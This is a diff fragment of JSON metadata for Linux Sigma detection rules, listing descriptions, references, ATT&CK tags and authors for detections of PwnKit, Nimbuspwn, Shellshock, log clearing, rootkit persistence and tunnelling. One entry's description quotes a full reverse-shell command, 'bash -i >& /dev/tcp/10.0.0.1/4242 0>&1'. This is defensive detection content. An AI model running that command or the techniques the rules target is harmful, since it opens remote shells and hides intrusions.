"author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Rare temporary workaround for library misconfiguration" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", + "uuid": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", + "value": "Nimbuspwn Exploitation", + "meta": { + "refs": [ + 
"https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/", + "https://github.com/Immersive-Labs-Sec/nimbuspwn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2022/05/04", + "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", + "uuid": "0506a799-698b-43b4-85a1-ac4c84c720e9", + "value": "PwnKit Local Privilege Escalation", + "meta": { + "refs": [ + "https://twitter.com/wdormann/status/1486161836961579020", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_pwnkit_local_privilege_escalation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.001" + ], + "creation_date": "2022/01/26", + "filename": "lnx_pwnkit_local_privilege_escalation.yml", + "author": "Sreeman", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects shellshock expressions in log files", + "uuid": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", + "value": "Shellshock Expression", + "meta": { + "refs": [ + "https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shellshock.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2017/03/14", + "filename": "lnx_shellshock.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": 
"linux" + } + }, + { + "description": "Clear command history in linux which is used for defense evasion.", + "uuid": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", + "value": "Clear Command History", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", + "https://attack.mitre.org/techniques/T1070/003/", + "https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ], + "creation_date": "2019/03/24", + "filename": "lnx_shell_clear_cmd_history.yml", + "author": "Patrick Bareiss", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.", + "uuid": "444ade84-c362-4260-b1f3-e45e20e1a905", + "value": "Privilege Escalation Preparation", + "meta": { + "refs": [ + "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", + "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", + "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ], + "creation_date": "2019/04/05", + "filename": "lnx_shell_priv_esc_prep.yml", + "author": "Patrick Bareiss", + "level": "medium", + "falsepositive": [ + "Troubleshooting on Linux Machines" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious shell commands used in 
various exploit codes (see references)", + "uuid": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", + "value": "Suspicious Activity in Shell Commands", + "meta": { + "refs": [ + "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", + "http://pastebin.com/FtygZ1cg", + "https://artkond.com/2017/03/23/pivoting-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ], + "creation_date": "2017/08/21", + "filename": "lnx_shell_susp_commands.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious log entries in Linux log files", + "uuid": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", + "value": "Suspicious Log Entries", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_log_entries.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2017/03/25", + "filename": "lnx_shell_susp_log_entries.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell", + "uuid": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", + "value": "Suspicious Reverse Shell Command Line", + "meta": { + "refs": [ + "https://alamot.github.io/reverse_shells/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_rev_shells.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ], 
+ "creation_date": "2019/04/02", + "filename": "lnx_shell_susp_rev_shells.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects space after filename", + "uuid": "879c3015-c88b-4782-93d7-07adf92dbcb7", + "value": "Space After Filename", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1064", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_space_after_filename_.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2020/06/17", + "filename": "lnx_space_after_filename_.yml", + "author": "\u00d6mer G\u00fcnal", + "level": "low", + "falsepositive": [ + "Typos" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "uuid": "7fcc54cb-f27d-4684-84b7-436af096f858", + "value": "Sudo Privilege Escalation CVE-2019-14287 - Builtin", + "meta": { + "refs": [ + "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://access.redhat.com/security/cve/cve-2019-14287", + "https://twitter.com/matthieugarin/status/1183970598210412546", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" + ], + "creation_date": "2019/10/15", + "filename": "lnx_sudo_cve_2019_14287_user.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious command with /dev/tcp", + "uuid": "6cc5fceb-9a71-4c23-aeeb-963abe0b279c", + "value": "Suspicious Use of /dev/tcp", + "meta": { + "refs": [ + 
"https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", + "https://book.hacktricks.xyz/shells/shells/linux", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" + ], + "tags": [ + "attack.reconnaissance" + ], + "creation_date": "2021/12/10", + "filename": "lnx_susp_dev_tcp.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious command sequence that JexBoss", + "uuid": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", + "value": "JexBoss Command Sequence", + "meta": { + "refs": [ + "https://www.us-cert.gov/ncas/analysis-reports/AR18-312A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_jexboss.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ], + "creation_date": "2017/08/24", + "filename": "lnx_susp_jexboss.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", + "uuid": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", + "value": "Symlink Etc Passwd", + "meta": { + "refs": [ + "https://www.qualys.com/2021/05/04/21nails/21nails.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_symlink_etc_passwd.yml" + ], + "tags": [ + "attack.t1204.001", + "attack.execution" + ], + "creation_date": "2019/04/05", + "filename": "lnx_symlink_etc_passwd.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" 
+ } + }, + { + "description": "Detects the creation of doas.conf file in linux host platform.", + "uuid": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", + "value": "Linux Doas Conf File Creation", + "meta": { + "refs": [ + "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2022/01/20", + "filename": "file_create_lnx_doas_conf_creation.yml", + "author": "Sittikorn S, Teoderick Contreras", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_create", + "logsource.product": "linux" + } + }, + { + "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", + "uuid": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", + "value": "Persistence Via Cron Files", + "meta": { + "refs": [ + "https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_cron_files.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ], + "creation_date": "2021/10/15", + "filename": "file_create_lnx_persistence_cron_files.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "medium", + "falsepositive": [ + "Any legitimate cron file." 
+ ], + "logsource.category": "file_create", + "logsource.product": "linux" + } + }, + { + "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", + "uuid": "ddb26b76-4447-4807-871f-1b035b2bfa5d", + "value": "Persistence Via Sudoers Files", + "meta": { + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_sudoers_files.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ], + "creation_date": "2022/07/05", + "filename": "file_create_lnx_persistence_sudoers_files.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Creation of legitimate files in sudoers.d folder part of administrator work" + ], + "logsource.category": "file_create", + "logsource.product": "linux" + } + }, + { + "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", + "uuid": "c0239255-822c-4630-b7f1-35362bcb8f44", + "value": "Triple Cross eBPF Rootkit Default LockFile", + "meta": { + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_lock_file.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/07/05", + "filename": "file_create_lnx_triple_cross_rootkit_lock_file.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_create", + "logsource.product": "linux" + } + }, + { + "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. 
Which both are related to the TripleCross persistence method", + "uuid": "1a2ea919-d11d-4d1e-8535-06cda13be20f", + "value": "Triple Cross eBPF Rootkit Default Persistence", + "meta": { + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1053.003" + ], + "creation_date": "2022/07/05", + "filename": "file_create_lnx_triple_cross_rootkit_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_create", + "logsource.product": "linux" + } + }, + { + "description": "Detects multiple blocks by the mod_security module (Web Application Firewall)", + "uuid": "a06eea10-d932-4aa6-8ba9-186df72c8d23", + "value": "Multiple Modsecurity Blocks", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/modsecurity/modsec_mulitple_blocks.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499" + ], + "creation_date": "2017/02/28", + "filename": "modsec_mulitple_blocks.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Vulnerability scanners", + "Frequent attacks if system faces Internet" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", + "uuid": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", + "value": "Linux Reverse Shell Indicator", + "meta": { + "refs": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" + ], + "tags": "No established tags", + "creation_date": "2021/10/16", + "filename": "net_connection_lnx_back_connect_shell_dev.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "network_connection", + "logsource.product": "linux" + } + }, + { + "description": "Detects process connections to a Monero crypto mining pool", + "uuid": "a46c93b7-55ed-4d27-a41b-c259456c4746", + "value": "Linux Crypto Mining Pool Connections", + "meta": { + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" + ], + "tags": "No established tags", + "creation_date": "2021/10/26", + "filename": "net_connection_lnx_crypto_mining_indicators.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "logsource.category": "network_connection", + "logsource.product": "linux" + } + }, + { + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "uuid": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", + "value": "Communication To Ngrok Tunneling Service - Linux", + "meta": { + "refs": [ + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" + ], + "creation_date": "2022/11/03", + "filename": "net_connection_lnx_ngrok_tunnel.yml", + 
"author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of ngrok" + ], + "logsource.category": "network_connection", + "logsource.product": "linux" + } + }, + { + "description": "Detects relevant ClamAV messages", + "uuid": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", + "value": "Relevant ClamAV Message", + "meta": { + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_clamav.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.001" + ], + "creation_date": "2017/03/01", + "filename": "lnx_clamav.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects disabling security tools", + "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", + "value": "Disabling Security Tools - Builtin", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_security_tools_disabling_syslog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2020/06/17", + "filename": "lnx_security_tools_disabling_syslog.yml", + "author": "\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects exploitation attempt using public exploit code for CVE-2018-15473", + "uuid": "4c9d903d-4939-4094-ade0-3cb748f4d7da", + "value": "SSHD Error Message CVE-2018-15473", + "meta": { + "refs": [ + "https://github.com/Rhynorater/CVE-2018-15473-Exploit", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_ssh_cve_2018_15473.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1589" + ], + "creation_date": "2017/08/24", + "filename": "lnx_ssh_cve_2018_15473.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "uuid": "fc947f8e-ea81-4b14-9a7b-13f888f94e18", + "value": "Failed Logins with Different Accounts from Single Source - Linux", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_failed_logons_single_source.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2017/02/16", + "filename": "lnx_susp_failed_logons_single_source.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Workstations with frequently changing users" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious session with two users present", + "uuid": "1edd77db-0669-4fef-9598-165bda82826d", + "value": "Guacamole Two Users Sharing Session Anomaly", + "meta": { + "refs": [ + "https://research.checkpoint.com/2020/apache-guacamole-rce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_guacamole.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ], + "creation_date": "2020/07/03", + "filename": "lnx_susp_guacamole.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be 
caused by exploiting attempts", + "uuid": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", + "value": "Suspicious Named Error", + "meta": { + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_named.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2018/02/20", + "filename": "lnx_susp_named.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "uuid": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", + "value": "Suspicious OpenSSH Daemon Error", + "meta": { + "refs": [ + "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_ssh.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2017/06/30", + "filename": "lnx_susp_ssh.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "uuid": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", + "value": "Suspicious VSFTPD Error Messages", + "meta": { + "refs": [ + "https://github.com/dagwieers/vsftpd/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_vsftp.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" 
+ ], + "creation_date": "2017/07/05", + "filename": "lnx_susp_vsftp.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", + "uuid": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", + "value": "Scheduled Task/Job At", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_at_command.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.002" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_lnx_at_command.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", + "uuid": "e2072cab-8c9a-459b-b63c-40ae79e27031", + "value": "Decode Base64 Encoded Text", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_lnx_base64_decode.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + 
"logsource.product": "linux" + } + }, + { + "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", + "uuid": "ba592c6d-6888-43c3-b8c6-689b8fe47337", + "value": "Linux Base64 Encoded Pipe to Shell", + "meta": { + "refs": [ + "https://github.com/arget13/DDexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ], + "creation_date": "2022/07/26", + "filename": "proc_creation_lnx_base64_execution.yml", + "author": "pH-T", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", + "uuid": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", + "value": "Linux Base64 Encoded Shebang In CLI", + "meta": { + "refs": [ + "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", + "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_lnx_base64_shebang_cli.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects the usage of the unsafe bpftrace option", + "uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", + "value": "BPFtrace Unsafe Option Usage", + "meta": { + "refs": [ + "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", + 
"https://bpftrace.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ], + "creation_date": "2022/02/11", + "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml", + "author": "Andreas Hunkeler (@Karneades)", + "level": "medium", + "falsepositive": [ + "Legitimate usage of the unsafe option" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", + "uuid": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", + "value": "Cat Sudoers", + "meta": { + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_lnx_cat_sudoers.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", + "uuid": "34979410-e4b5-4e5d-8cfb-389fdff05c12", + "value": "Remove Immutable File Attribute", + "meta": { + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_lnx_chattr_immutable_removal.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Administrator 
interacting with immutable files (e.g. for instance backups)." + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion", + "uuid": "80915f59-9b56-4616-9de0-fd0dea6c12fe", + "value": "Clear Linux Logs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_lnx_clear_logs.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", + "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", + "value": "Commands to Clear or Remove the Syslog", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ], + "creation_date": "2021/10/15", + "filename": "proc_creation_lnx_clear_syslog.yml", + "author": "Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "high", + "falsepositive": [ + "Log rotation." 
